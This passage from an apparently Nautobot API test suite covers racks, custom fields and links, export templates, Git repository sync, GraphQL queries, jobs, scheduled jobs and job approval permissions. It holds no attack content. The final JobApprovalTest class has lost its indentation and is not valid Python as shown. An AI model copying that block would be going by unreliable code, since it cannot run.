            role=self.rackrole1,
            name="Test Rack 2",
            u_height=42,
        )
        # change the created and last_updated of one
        # (queryset.update() bypasses auto-set timestamp fields, so the backdate sticks)
        Rack.objects.filter(pk=self.rack2.pk).update(
            last_updated=make_aware(datetime(2001, 2, 3, 1, 2, 3, 4)),
            created=make_aware(datetime(2001, 2, 3)),
        )
    def test_get_rack_created(self):
        # Exact-date match should return only the backdated rack2.
        self.add_permissions("dcim.view_rack")
        url = reverse("dcim-api:rack-list")
        response = self.client.get("{}?created=2001-02-03".format(url), **self.header)
        self.assertEqual(response.data["count"], 1)
        self.assertEqual(response.data["results"][0]["id"], str(self.rack2.pk))
    def test_get_rack_created_gte(self):
        # created >= 2001-02-04 excludes the backdated rack2, leaving rack1.
        self.add_permissions("dcim.view_rack")
        url = reverse("dcim-api:rack-list")
        response = self.client.get("{}?created__gte=2001-02-04".format(url), **self.header)
        self.assertEqual(response.data["count"], 1)
        self.assertEqual(response.data["results"][0]["id"], str(self.rack1.pk))
    def test_get_rack_created_lte(self):
        # created <= 2001-02-04 matches only the backdated rack2.
        self.add_permissions("dcim.view_rack")
        url = reverse("dcim-api:rack-list")
        response = self.client.get("{}?created__lte=2001-02-04".format(url), **self.header)
        self.assertEqual(response.data["count"], 1)
        self.assertEqual(response.data["results"][0]["id"], str(self.rack2.pk))
    def test_get_rack_last_updated(self):
        # Exact timestamp match; %20 is a URL-encoded space between date and time.
        self.add_permissions("dcim.view_rack")
        url = reverse("dcim-api:rack-list")
        response = self.client.get("{}?last_updated=2001-02-03%2001:02:03.000004".format(url), **self.header)
        self.assertEqual(response.data["count"], 1)
        self.assertEqual(response.data["results"][0]["id"], str(self.rack2.pk))
    def test_get_rack_last_updated_gte(self):
        self.add_permissions("dcim.view_rack")
        url = reverse("dcim-api:rack-list")
        response = self.client.get("{}?last_updated__gte=2001-02-04%2001:02:03.000004".format(url), **self.header)
        self.assertEqual(response.data["count"], 1)
        self.assertEqual(response.data["results"][0]["id"], str(self.rack1.pk))
    def test_get_rack_last_updated_lte(self):
        self.add_permissions("dcim.view_rack")
        url = reverse("dcim-api:rack-list")
        response = self.client.get("{}?last_updated__lte=2001-02-04%2001:02:03.000004".format(url), **self.header)
        self.assertEqual(response.data["count"], 1)
        self.assertEqual(response.data["results"][0]["id"], str(self.rack2.pk))
class CustomFieldTest(APIViewTestCases.APIViewTestCase):
    """API CRUD tests for the CustomField model."""
    model = CustomField
    brief_fields = ["display", "id", "name", "url"]
    create_data = [
        {
            "content_types": ["dcim.site"],
            "name": "cf4",
            "type": "date",
        },
        {
            "content_types": ["dcim.site"],
            "name": "cf5",
            "type": "url",
        },
        {
            "content_types": ["dcim.site"],
            "name": "cf6",
            "type": "select",
        },
    ]
    update_data = {
        "content_types": ["dcim.site"],
        "name": "cf1",
        "label": "foo",
    }
    bulk_update_data = {
        "description": "New description",
    }
    choices_fields = ["filter_logic", "type"]
    @classmethod
    def setUpTestData(cls):
        # Pre-existing custom fields of assorted types, all bound to the Site content type.
        site_ct = ContentType.objects.get_for_model(Site)
        custom_fields = (
            CustomField.objects.create(name="cf1", type="text"),
            CustomField.objects.create(name="cf2", type="integer"),
            CustomField.objects.create(name="cf3", type="boolean"),
        )
        for cf in custom_fields:
            cf.content_types.add(site_ct)
class CustomLinkTest(APIViewTestCases.APIViewTestCase):
    """API CRUD tests for the CustomLink model."""

    model = CustomLink
    brief_fields = ["content_type", "display", "id", "name", "url"]
    create_data = [
        {
            "content_type": "dcim.site",
            "name": "api-test-4",
            "text": "API customlink text 4",
            "target_url": "http://api-test-4.com/test4",
            "weight": 100,
            "new_window": False,
        },
        {
            "content_type": "dcim.site",
            "name": "api-test-5",
            "text": "API customlink text 5",
            "target_url": "http://api-test-5.com/test5",
            "weight": 100,
            "new_window": False,
        },
        {
            "content_type": "dcim.site",
            "name": "api-test-6",
            "text": "API customlink text 6",
            "target_url": "http://api-test-6.com/test6",
            "weight": 100,
            "new_window": False,
        },
    ]
    choices_fields = ["button_class"]

    @classmethod
    def setUpTestData(cls):
        # Seed three pre-existing links attached to the Site content type,
        # differing only in their numeric suffix.
        site_type = ContentType.objects.get_for_model(Site)
        for index in (1, 2, 3):
            CustomLink.objects.create(
                content_type=site_type,
                name=f"api-test-{index}",
                text=f"API customlink text {index}",
                target_url=f"http://api-test-{index}.com/test{index}",
                weight=100,
                new_window=False,
            )
class ExportTemplateTest(APIViewTestCases.APIViewTestCase):
    """API CRUD tests for the ExportTemplate model."""

    model = ExportTemplate
    brief_fields = ["display", "id", "name", "url"]
    create_data = [
        {
            "content_type": "dcim.device",
            "name": "Test Export Template 4",
            "template_code": "{% for obj in queryset %}{{ obj.name }}\n{% endfor %}",
        },
        {
            "content_type": "dcim.device",
            "name": "Test Export Template 5",
            "template_code": "{% for obj in queryset %}{{ obj.name }}\n{% endfor %}",
        },
        {
            "content_type": "dcim.device",
            "name": "Test Export Template 6",
            "template_code": "{% for obj in queryset %}{{ obj.name }}\n{% endfor %}",
        },
    ]
    bulk_update_data = {
        "description": "New description",
    }
    choices_fields = ["owner_content_type", "content_type"]

    @classmethod
    def setUpTestData(cls):
        # Three pre-existing templates bound to Device; identical template code,
        # distinct names.
        device_type = ContentType.objects.get_for_model(Device)
        for template_name in ("Export Template 1", "Export Template 2", "Export Template 3"):
            ExportTemplate.objects.create(
                content_type=device_type,
                name=template_name,
                template_code="{% for obj in queryset %}{{ obj.name }}\n{% endfor %}",
            )
# Override the JOB_LOGS to None so that the Log Objects are created in the default database.
# This change is required as JOB_LOGS is a `fake` database pointed at the default. The django
# database cleanup will fail and cause tests to fail as this is not a real database.
@mock.patch("nautobot.extras.models.models.JOB_LOGS", None)
class GitRepositoryTest(APIViewTestCases.APIViewTestCase):
    """API CRUD tests for GitRepository, plus the /sync/ custom action."""
    model = GitRepository
    brief_fields = ["display", "id", "name", "url"]
    bulk_update_data = {
        "branch": "develop",
    }
    choices_fields = ["provided_contents"]
    slug_source = "name"
    @classmethod
    def setUpTestData(cls):
        secrets_groups = (
            SecretsGroup.objects.create(name="Secrets Group 1", slug="secrets-group-1"),
            SecretsGroup.objects.create(name="Secrets Group 2", slug="secrets-group-2"),
        )
        cls.repos = (
            GitRepository(
                name="Repo 1",
                slug="repo-1",
                remote_url="https://example.com/repo1.git",
                secrets_group=secrets_groups[0],
            ),
            GitRepository(
                name="Repo 2",
                slug="repo-2",
                remote_url="https://example.com/repo2.git",
                secrets_group=secrets_groups[0],
            ),
            # Repo 3 intentionally has no secrets_group.
            GitRepository(name="Repo 3", slug="repo-3", remote_url="https://example.com/repo3.git"),
        )
        for repo in cls.repos:
            # trigger_resync=False avoids enqueueing a sync job during fixture setup.
            repo.save(trigger_resync=False)
        cls.create_data = [
            {
                "name": "New Git Repository 1",
                "slug": "new-git-repository-1",
                "remote_url": "https://example.com/newrepo1.git",
                "secrets_group": secrets_groups[1].pk,
            },
            {
                "name": "New Git Repository 2",
                "slug": "new-git-repository-2",
                "remote_url": "https://example.com/newrepo2.git",
                "secrets_group": secrets_groups[1].pk,
            },
            {
                "name": "New Git Repository 3",
                "slug": "new-git-repository-3",
                "remote_url": "https://example.com/newrepo3.git",
                "secrets_group": secrets_groups[1].pk,
            },
            # No slug given: exercises auto-generation from the name (see slug_source).
            {
                "name": "New Git Repository 4",
                "remote_url": "https://example.com/newrepo3.git",
                "secrets_group": secrets_groups[1].pk,
            },
        ]
    @override_settings(EXEMPT_VIEW_PERMISSIONS=[])
    @mock.patch("nautobot.extras.api.views.get_worker_count")
    def test_run_git_sync_no_celery_worker(self, mock_get_worker_count):
        """Git sync cannot be triggered if Celery is not running."""
        mock_get_worker_count.return_value = 0
        self.add_permissions("extras.add_gitrepository")
        self.add_permissions("extras.change_gitrepository")
        url = reverse("extras-api:gitrepository-sync", kwargs={"pk": self.repos[0].id})
        response = self.client.post(url, format="json", **self.header)
        self.assertHttpStatus(response, status.HTTP_503_SERVICE_UNAVAILABLE)
        self.assertEqual(response.data["detail"], "Unable to process request: Celery worker process not running.")
    @override_settings(EXEMPT_VIEW_PERMISSIONS=[])
    @mock.patch("nautobot.extras.api.views.get_worker_count")
    def test_run_git_sync_nonexistent_repo(self, mock_get_worker_count):
        """Git sync request handles case of a nonexistent repository."""
        mock_get_worker_count.return_value = 1
        self.add_permissions("extras.add_gitrepository")
        self.add_permissions("extras.change_gitrepository")
        url = reverse("extras-api:gitrepository-sync", kwargs={"pk": "11111111-1111-1111-1111-111111111111"})
        response = self.client.post(url, format="json", **self.header)
        self.assertHttpStatus(response, status.HTTP_404_NOT_FOUND)
    @override_settings(EXEMPT_VIEW_PERMISSIONS=[])
    @mock.patch("nautobot.extras.api.views.get_worker_count")
    def test_run_git_sync_without_permissions(self, mock_get_worker_count):
        """Git sync request verifies user permissions."""
        mock_get_worker_count.return_value = 1
        url = reverse("extras-api:gitrepository-sync", kwargs={"pk": self.repos[0].id})
        response = self.client.post(url, format="json", **self.header)
        self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
    @override_settings(EXEMPT_VIEW_PERMISSIONS=[])
    @mock.patch("nautobot.extras.api.views.get_worker_count")
    def test_run_git_sync_with_permissions(self, mock_get_worker_count):
        """Git sync request can be submitted successfully."""
        mock_get_worker_count.return_value = 1
        self.add_permissions("extras.add_gitrepository")
        self.add_permissions("extras.change_gitrepository")
        url = reverse("extras-api:gitrepository-sync", kwargs={"pk": self.repos[0].id})
        response = self.client.post(url, format="json", **self.header)
        self.assertHttpStatus(response, status.HTTP_200_OK)
class GraphQLQueryTest(APIViewTestCases.APIViewTestCase):
    """API CRUD tests for saved GraphQL queries, plus the /run/ custom action."""
    model = GraphQLQuery
    brief_fields = ["display", "id", "name", "url"]
    create_data = [
        {
            "name": "graphql-query-4",
            "slug": "graphql-query-4",
            "query": "{ query: sites {name} }",
        },
        {
            "name": "graphql-query-5",
            "slug": "graphql-query-5",
            "query": '{ devices(role: "edge") { id, name, device_role { name slug } } }',
        },
        # No slug given: exercises auto-generation from the name (see slug_source).
        {
            "name": "Graphql Query 6",
            "query": '{ devices(role: "edge") { id, name, device_role { name slug } } }',
        },
    ]
    slug_source = "name"
    @classmethod
    def setUpTestData(cls):
        cls.graphqlqueries = (
            GraphQLQuery(
                name="graphql-query-1",
                slug="graphql-query-1",
                query="{ sites {name} }",
            ),
            GraphQLQuery(
                name="graphql-query-2",
                slug="graphql-query-2",
                query='{ devices(role: "edge") { id, name, device_role { name slug } } }',
            ),
            # A large query spanning many related models, parameterized by $device.
            GraphQLQuery(
                name="graphql-query-3",
                slug="graphql-query-3",
                query="""
            query ($device: [String!]) {
              devices(name: $device) {
                config_context
                name
                position
                serial
                primary_ip4 {
                  id
                  primary_ip4_for {
                    id
                    name
                  }
                }
                tenant {
                  name
                }
                tags {
                  name
                  slug
                }
                device_role {
                  name
                }
                platform {
                  name
                  slug
                  manufacturer {
                    name
                  }
                  napalm_driver
                }
                site {
                  name
                  slug
                  vlans {
                    id
                    name
                    vid
                  }
                  vlan_groups {
                    id
                  }
                }
                interfaces {
                  description
                  mac_address
                  enabled
                  name
                  ip_addresses {
                    address
                    tags {
                      id
                    }
                  }
                  connected_circuit_termination {
                    circuit {
                      cid
                      commit_rate
                      provider {
                        name
                      }
                    }
                  }
                  tagged_vlans {
                    id
                  }
                  untagged_vlan {
                    id
                  }
                  cable {
                    termination_a_type
                    status {
                      name
                    }
                    color
                  }
                  tagged_vlans {
                    site {
                      name
                    }
                    id
                  }
                  tags {
                    id
                  }
                }
              }
            }""",
            ),
        )
        for query in cls.graphqlqueries:
            query.full_clean()
            query.save()
    def test_run_saved_query(self):
        """Exercise the /run/ API endpoint."""
        self.add_permissions("extras.add_graphqlquery")
        self.add_permissions("extras.change_graphqlquery")
        self.add_permissions("extras.view_graphqlquery")
        # No Sites/Devices exist in the test database, so both queries return empty lists.
        url = reverse("extras-api:graphqlquery-run", kwargs={"pk": self.graphqlqueries[0].pk})
        response = self.client.post(url, **self.header)
        self.assertHttpStatus(response, status.HTTP_200_OK)
        self.assertEqual({"data": {"sites": []}}, response.data)
        url = reverse("extras-api:graphqlquery-run", kwargs={"pk": self.graphqlqueries[2].pk})
        response = self.client.post(url, **self.header)
        self.assertHttpStatus(response, status.HTTP_200_OK)
        self.assertEqual({"data": {"devices": []}}, response.data)
# TODO: Standardize to APIViewTestCase (needs create & update tests)
class ImageAttachmentTest(
    APIViewTestCases.GetObjectViewTestCase,
    APIViewTestCases.ListObjectsViewTestCase,
    APIViewTestCases.DeleteObjectViewTestCase,
):
    """Read/list/delete API tests for image attachments."""

    model = ImageAttachment
    brief_fields = ["display", "id", "image", "name", "url"]
    choices_fields = ["content_type"]

    @classmethod
    def setUpTestData(cls):
        site_type = ContentType.objects.get_for_model(Site)
        site = Site.objects.create(name="Site 1", slug="site-1")
        # Three attachments on the same site, differing only in name and image URL.
        for n in (1, 2, 3):
            ImageAttachment.objects.create(
                content_type=site_type,
                object_id=site.pk,
                name=f"Image Attachment {n}",
                image=f"http://example.com/image{n}.png",
                image_height=100,
                image_width=100,
            )
class JobTest(APITestCase):
    """Tests for the Job list/detail/run API endpoints, using a locally-defined TestJob class."""
    class TestJob(Job):
        class Meta:
            name = "Test job"
        var1 = StringVar()
        var2 = IntegerVar(required=True)  # explicitly stated, though required=True is the default in any case
        var3 = BooleanVar()
        var4 = ObjectVar(model=DeviceRole)
        def run(self, data, commit=True):
            # Exercise each log level once; the return value becomes the job's output.
            self.log_debug(message=data["var1"])
            self.log_info(message=data["var2"])
            self.log_success(message=data["var3"])
            self.log_warning(message=data["var4"])
            return "Job complete"
    def get_test_job_class(self, class_path):
        # Replacement for JobViewSet._get_job_class: only our TestJob class path resolves.
        if class_path == "local/test_api/TestJob":
            return self.TestJob
        raise Http404
    def setUp(self):
        super().setUp()
        # Monkey-patch the API viewset's _get_job_class method to return our test class above
        # NOTE(review): this patch is never undone, so it persists for the process lifetime.
        JobViewSet._get_job_class = self.get_test_job_class
    @override_settings(EXEMPT_VIEW_PERMISSIONS=["*"], JOBS_ROOT=THIS_DIRECTORY)
    def test_list_jobs_anonymous(self):
        url = reverse("extras-api:job-list")
        response = self.client.get(url, **self.header)
        self.assertHttpStatus(response, status.HTTP_200_OK)
    @override_settings(EXEMPT_VIEW_PERMISSIONS=[], JOBS_ROOT=THIS_DIRECTORY)
    def test_list_jobs_without_permission(self):
        url = reverse("extras-api:job-list")
        with disable_warnings("django.request"):
            response = self.client.get(url, **self.header)
        self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
    @override_settings(EXEMPT_VIEW_PERMISSIONS=[], JOBS_ROOT=THIS_DIRECTORY)
    @skipIf(
        "dummy_plugin" not in settings.PLUGINS,
        "dummy_plugin not in settings.PLUGINS",
    )
    def test_list_jobs_with_permission(self):
        self.add_permissions("extras.view_job")
        url = reverse("extras-api:job-list")
        response = self.client.get(url, **self.header)
        self.assertHttpStatus(response, status.HTTP_200_OK)
        # At a minimum, the job provided by the dummy plugin should be present
        self.assertNotEqual(response.data, [])
        self.assertIn(
            "plugins/dummy_plugin.jobs/DummyJob",
            [job["id"] for job in response.data],
        )
    @override_settings(EXEMPT_VIEW_PERMISSIONS=["*"], JOBS_ROOT=THIS_DIRECTORY)
    def test_get_job_anonymous(self):
        url = reverse("extras-api:job-detail", kwargs={"class_path": "local/test_api/TestJob"})
        response = self.client.get(url, **self.header)
        self.assertHttpStatus(response, status.HTTP_200_OK)
    @override_settings(EXEMPT_VIEW_PERMISSIONS=[], JOBS_ROOT=THIS_DIRECTORY)
    def test_get_job_without_permission(self):
        url = reverse("extras-api:job-detail", kwargs={"class_path": "local/test_api/TestJob"})
        with disable_warnings("django.request"):
            response = self.client.get(url, **self.header)
        self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
    @override_settings(EXEMPT_VIEW_PERMISSIONS=[], JOBS_ROOT=THIS_DIRECTORY)
    def test_get_job_with_permission(self):
        self.add_permissions("extras.view_job")
        # Try GET to permitted object
        url = reverse("extras-api:job-detail", kwargs={"class_path": "local/test_api/TestJob"})
        response = self.client.get(url, **self.header)
        self.assertHttpStatus(response, status.HTTP_200_OK)
        self.assertEqual(response.data["name"], self.TestJob.name)
        self.assertEqual(response.data["vars"]["var1"], "StringVar")
        self.assertEqual(response.data["vars"]["var2"], "IntegerVar")
        self.assertEqual(response.data["vars"]["var3"], "BooleanVar")
        # Try GET to non-existent object
        url = reverse("extras-api:job-detail", kwargs={"class_path": "local/test_api/NoSuchJob"})
        response = self.client.get(url, **self.header)
        self.assertHttpStatus(response, status.HTTP_404_NOT_FOUND)
    @override_settings(EXEMPT_VIEW_PERMISSIONS=[], JOBS_ROOT=THIS_DIRECTORY)
    @mock.patch("nautobot.extras.api.views.get_worker_count")
    def test_run_job_without_permission(self, mock_get_worker_count):
        """Job run request enforces user permissions."""
        mock_get_worker_count.return_value = 1
        url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
        with disable_warnings("django.request"):
            response = self.client.post(url, {}, format="json", **self.header)
        self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
    @mock.patch("nautobot.extras.api.views.get_worker_count")
    def test_run_job_no_worker(self, mock_get_worker_count):
        """Job run cannot be requested if Celery is not running."""
        mock_get_worker_count.return_value = 0
        self.add_permissions("extras.run_job")
        device_role = DeviceRole.objects.create(name="role", slug="role")
        job_data = {
            "var1": "FooBar",
            "var2": 123,
            "var3": False,
            "var4": device_role.pk,
        }
        data = {
            "data": job_data,
            "commit": True,
        }
        url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
        response = self.client.post(url, data, format="json", **self.header)
        self.assertHttpStatus(response, status.HTTP_503_SERVICE_UNAVAILABLE)
        self.assertEqual(response.data["detail"], "Unable to process request: Celery worker process not running.")
    @override_settings(EXEMPT_VIEW_PERMISSIONS=["*"], JOBS_ROOT=THIS_DIRECTORY)
    @mock.patch("nautobot.extras.api.views.get_worker_count")
    def test_run_job_object_var(self, mock_get_worker_count):
        """Job run requests can reference objects by their primary keys."""
        mock_get_worker_count.return_value = 1
        self.add_permissions("extras.run_job")
        device_role = DeviceRole.objects.create(name="role", slug="role")
        job_data = {
            "var1": "FooBar",
            "var2": 123,
            "var3": False,
            "var4": device_role.pk,
        }
        data = {
            "data": job_data,
            "commit": True,
            "schedule": {
                "name": "test",
                "interval": "future",
                "start_time": str(datetime.now() + timedelta(minutes=1)),
            },
        }
        url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
        response = self.client.post(url, data, format="json", **self.header)
        self.assertHttpStatus(response, status.HTTP_200_OK)
        # The PK should be serialized to a string in the stored schedule kwargs.
        job = ScheduledJob.objects.last()
        self.assertEqual(job.kwargs["data"]["var4"], str(device_role.pk))
    @override_settings(EXEMPT_VIEW_PERMISSIONS=["*"], JOBS_ROOT=THIS_DIRECTORY)
    @mock.patch("nautobot.extras.api.views.get_worker_count")
    def test_run_job_object_var_lookup(self, mock_get_worker_count):
        """Job run requests can reference objects by their attributes."""
        mock_get_worker_count.return_value = 1
        self.add_permissions("extras.run_job")
        device_role = DeviceRole.objects.create(name="role", slug="role")
        job_data = {
            "var1": "FooBar",
            "var2": 123,
            "var3": False,
            "var4": {"name": "role"},
        }
        # deserialize_data should resolve the {"name": ...} lookup to the model instance.
        self.assertEqual(
            self.TestJob.deserialize_data(job_data),
            {"var1": "FooBar", "var2": 123, "var3": False, "var4": device_role},
        )
        url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
        response = self.client.post(url, {"data": job_data}, format="json", **self.header)
        self.assertHttpStatus(response, status.HTTP_200_OK)
    @override_settings(EXEMPT_VIEW_PERMISSIONS=["*"], JOBS_ROOT=THIS_DIRECTORY)
    @mock.patch("nautobot.extras.api.views.get_worker_count")
    def test_run_job_future(self, mock_get_worker_count):
        mock_get_worker_count.return_value = 1
        self.add_permissions("extras.run_job")
        d = DeviceRole.objects.create(name="role", slug="role")
        data = {
            "data": {"var1": "x", "var2": 1, "var3": False, "var4": d.pk},
            "commit": True,
            "schedule": {
                "start_time": str(datetime.now() + timedelta(minutes=1)),
                "interval": "future",
                "name": "test",
            },
        }
        url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
        response = self.client.post(url, data, format="json", **self.header)
        self.assertHttpStatus(response, status.HTTP_200_OK)
    @override_settings(EXEMPT_VIEW_PERMISSIONS=["*"], JOBS_ROOT=THIS_DIRECTORY)
    @mock.patch("nautobot.extras.api.views.get_worker_count")
    def test_run_job_future_past(self, mock_get_worker_count):
        # A "future" schedule with a start time in the past must be rejected.
        mock_get_worker_count.return_value = 1
        self.add_permissions("extras.run_job")
        d = DeviceRole.objects.create(name="role", slug="role")
        data = {
            "data": {"var1": "x", "var2": 1, "var3": False, "var4": d.pk},
            "commit": True,
            "schedule": {
                "start_time": str(datetime.now() - timedelta(minutes=1)),
                "interval": "future",
                "name": "test",
            },
        }
        url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
        response = self.client.post(url, data, format="json", **self.header)
        self.assertHttpStatus(response, status.HTTP_400_BAD_REQUEST)
    @override_settings(EXEMPT_VIEW_PERMISSIONS=["*"], JOBS_ROOT=THIS_DIRECTORY)
    @mock.patch("nautobot.extras.api.views.get_worker_count")
    def test_run_job_interval(self, mock_get_worker_count):
        mock_get_worker_count.return_value = 1
        self.add_permissions("extras.run_job")
        d = DeviceRole.objects.create(name="role", slug="role")
        data = {
            "data": {"var1": "x", "var2": 1, "var3": False, "var4": d.pk},
            "commit": True,
            "schedule": {
                "start_time": str(datetime.now() + timedelta(minutes=1)),
                "interval": "hourly",
                "name": "test",
            },
        }
        url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
        response = self.client.post(url, data, format="json", **self.header)
        self.assertHttpStatus(response, status.HTTP_200_OK)
    @override_settings(EXEMPT_VIEW_PERMISSIONS=[], JOBS_ROOT=THIS_DIRECTORY)
    def test_run_job_with_invalid_data(self):
        # "data" must be a dict, not a bare string.
        self.add_permissions("extras.run_job")
        data = {
            "data": "invalid",
            "commit": True,
        }
        url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
        response = self.client.post(url, data, format="json", **self.header)
        self.assertHttpStatus(response, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(response.data, {"errors": ["Job data needs to be a dict"]})
    @override_settings(EXEMPT_VIEW_PERMISSIONS=[], JOBS_ROOT=THIS_DIRECTORY)
    def test_run_job_with_wrong_data(self):
        # "var5" is not declared on TestJob and must be rejected.
        self.add_permissions("extras.run_job")
        job_data = {
            "var1": "FooBar",
            "var2": 123,
            "var3": False,
            "var5": "wrong",
        }
        data = {
            "data": job_data,
            "commit": True,
        }
        url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
        response = self.client.post(url, data, format="json", **self.header)
        self.assertHttpStatus(response, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(response.data, {"errors": {"var5": ["Job data contained an unknown property"]}})
    @override_settings(EXEMPT_VIEW_PERMISSIONS=[], JOBS_ROOT=THIS_DIRECTORY)
    def test_run_job_with_missing_data(self):
        # Required vars var2 and var4 are omitted and must be reported.
        self.add_permissions("extras.run_job")
        job_data = {
            "var1": "FooBar",
            "var3": False,
        }
        data = {
            "data": job_data,
            "commit": True,
        }
        url = reverse("extras-api:job-run", kwargs={"class_path": "local/test_api/TestJob"})
        response = self.client.post(url, data, format="json", **self.header)
        self.assertHttpStatus(response, status.HTTP_400_BAD_REQUEST)
        self.assertEqual(
            response.data, {"errors": {"var2": ["This field is required."], "var4": ["This field is required."]}}
        )
class JobResultTest(APITestCase):
    """Tests for delete permissions on JobResult objects."""

    @override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
    def test_delete_job_result_anonymous(self):
        """Deletion is denied for anonymous users even with exempt view permissions."""
        detail_url = reverse("extras-api:jobresult-detail", kwargs={"pk": 1})
        response = self.client.delete(detail_url, **self.header)
        self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)

    @override_settings(EXEMPT_VIEW_PERMISSIONS=[])
    def test_delete_job_result_without_permission(self):
        """Deletion is denied without the delete_jobresult permission."""
        detail_url = reverse("extras-api:jobresult-detail", kwargs={"pk": 1})
        with disable_warnings("django.request"):
            response = self.client.delete(detail_url, **self.header)
        self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)

    @override_settings(EXEMPT_VIEW_PERMISSIONS=[])
    def test_delete_job_result_with_permission(self):
        """A user with delete_jobresult may delete a job result."""
        self.add_permissions("extras.delete_jobresult")
        result = JobResult.objects.create(
            name="test",
            job_id=uuid.uuid4(),
            obj_type=ContentType.objects.get_for_model(GitRepository),
        )
        detail_url = reverse("extras-api:jobresult-detail", kwargs={"pk": result.pk})
        response = self.client.delete(detail_url, **self.header)
        self.assertHttpStatus(response, status.HTTP_204_NO_CONTENT)
class JobLogEntryTest(
    APIViewTestCases.GetObjectViewTestCase,
    APIViewTestCases.ListObjectsViewTestCase,
):
    """Read-only API tests for job log entries."""

    model = JobLogEntry
    brief_fields = [
        "absolute_url",
        "created",
        "grouping",
        "id",
        "job_result",
        "log_level",
        "log_object",
        "message",
        "url",
    ]
    choices_fields = []

    @classmethod
    def setUpTestData(cls):
        cls.job_result = JobResult.objects.create(
            name="test",
            job_id=uuid.uuid4(),
            obj_type=ContentType.objects.get_for_model(GitRepository),
        )
        # One log entry per level, all grouped under "run".
        levels = ("debug", "info", "success", "warning")
        for level in levels:
            JobLogEntry.objects.create(
                log_level=level,
                grouping="run",
                job_result=cls.job_result,
                message=f"I am a {level} log.",
            )

    def test_list_job_logs_from_job_results_detail(self):
        """Test `logs` endpoint from `JobResult` detail."""
        self.add_permissions("extras.view_jobresult")
        logs_url = reverse("extras-api:jobresult-logs", kwargs={"pk": self.job_result.pk})
        response = self.client.get(logs_url, **self.header)
        self.assertEqual(len(response.json()), JobLogEntry.objects.count())

    def test_options_objects_returns_display_and_value(self):
        """Overridden because this test case is not applicable to this viewset."""

    def test_options_returns_expected_choices(self):
        """Overridden because this test case is not applicable to this viewset."""
class ScheduledJobTest(
    APIViewTestCases.GetObjectViewTestCase,
    APIViewTestCases.ListObjectsViewTestCase,
):
    """Read-only API tests for scheduled jobs."""

    model = ScheduledJob
    brief_fields = ["interval", "name", "start_time"]
    choices_fields = []

    @classmethod
    def setUpTestData(cls):
        # Three approval-gated jobs owned by the same user, differing only in name.
        owner = User.objects.create(username="user1", is_active=True)
        for job_name in ("test1", "test2", "test3"):
            ScheduledJob.objects.create(
                name=job_name,
                task="-",
                job_class="-",
                interval=JobExecutionType.TYPE_IMMEDIATELY,
                user=owner,
                approval_required=True,
                start_time=now(),
            )

    def test_options_objects_returns_display_and_value(self):
        """Overridden because this test case is not applicable to this viewset."""

    def test_options_returns_expected_choices(self):
        """Overridden because this test case is not applicable to this viewset."""
class JobApprovalTest(APITestCase):
@classmethod
def setUpTestData(cls):
user = User.objects.create(username="user1", is_active=True)
cls.scheduled_job = ScheduledJob.objects.create(
name="test",
task="-",
job_class="-",
interval=JobExecutionType.TYPE_IMMEDIATELY,
user=user,
approval_required=True,
start_time=now(),
)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
def test_approve_job_anonymous(self):
url = reverse("extras-api:scheduledjob-approve", kwargs={"pk": 1})
response = self.client.post(url, **self.header)
self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
def test_approve_job_without_permission(self):
url = reverse("extras-api:scheduledjob-approve", kwargs={"pk": 1})
with disable_warnings("django.request"):
response = self.client.post(url, **self.header)
self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
def test_approve_job_same_user(self):
self.add_permissions("extras.run_job")
self.add_permissions("extras.add_scheduledjob")
scheduled_job = ScheduledJob.objects.create(
name="test",
task="-",
job_class="-",
interval=JobExecutionType.TYPE_IMMEDIATELY,
user=self.user,
approval_required=True,
start_time=now(),
)
url = reverse("extras-api:scheduledjob-approve", kwargs={"pk": scheduled_job.pk})
response = self.client.post(url, **self.header)
self.assertHttpStatus(response, status.HTTP_403_FORBIDDEN)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
def test_approve_job(self):
self.add_permissions("extras.run_job")
self.add_permissions("extras.add_scheduledjob")
url = reverse("extras-api:scheduledjob-approve", kwargs={"pk": self.scheduled_job.pk})
response = self.client.post(url, **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
def test_approve_job_in_past(self):
self.add_permissions("extras.run_job")
self.add_permissions("extras.add_scheduledjob")
user = User.objects.get(username="user1")
scheduled_job = ScheduledJob.objects.create(
name="test",
task="-",
job_class="-",
interval=JobExecutionType.TYPE_FUTURE,
one_off=True,
user=user,
approval_required=True,
start_time=now(),
)
url = reverse("extras-api:scheduledjob-approve", kwargs={"pk": scheduled_job.pk})
response = self.client.post(url, **self.header)
self.assertHttpStatus(response, status.HTTP_400_BAD_REQUEST)
@override_settings(EXEMPT_VIEW_PERMISSIONS=["*"])
def test_approve_job_in_past_force(self):
self.add_permissions("extras.run_job")
self.add_permissions("extras.add_scheduledjob")
user = User.objects.get(username="user1")
scheduled_job = ScheduledJob.objects.create(
name="test",
task="-",
job_class="-",
interval=JobExecutionType.TYPE_FUTURE,
one_off=True,
user=user,
approval_required=True,
start_time=now(),
)
url = reverse("extras-api:scheduledjob-approve", kwargs={"pk": scheduled_job.pk})
response = self.client.post(url + "?force=true", **self.header)
self.assertHttpStatus(response, status.HTTP_200_OK)
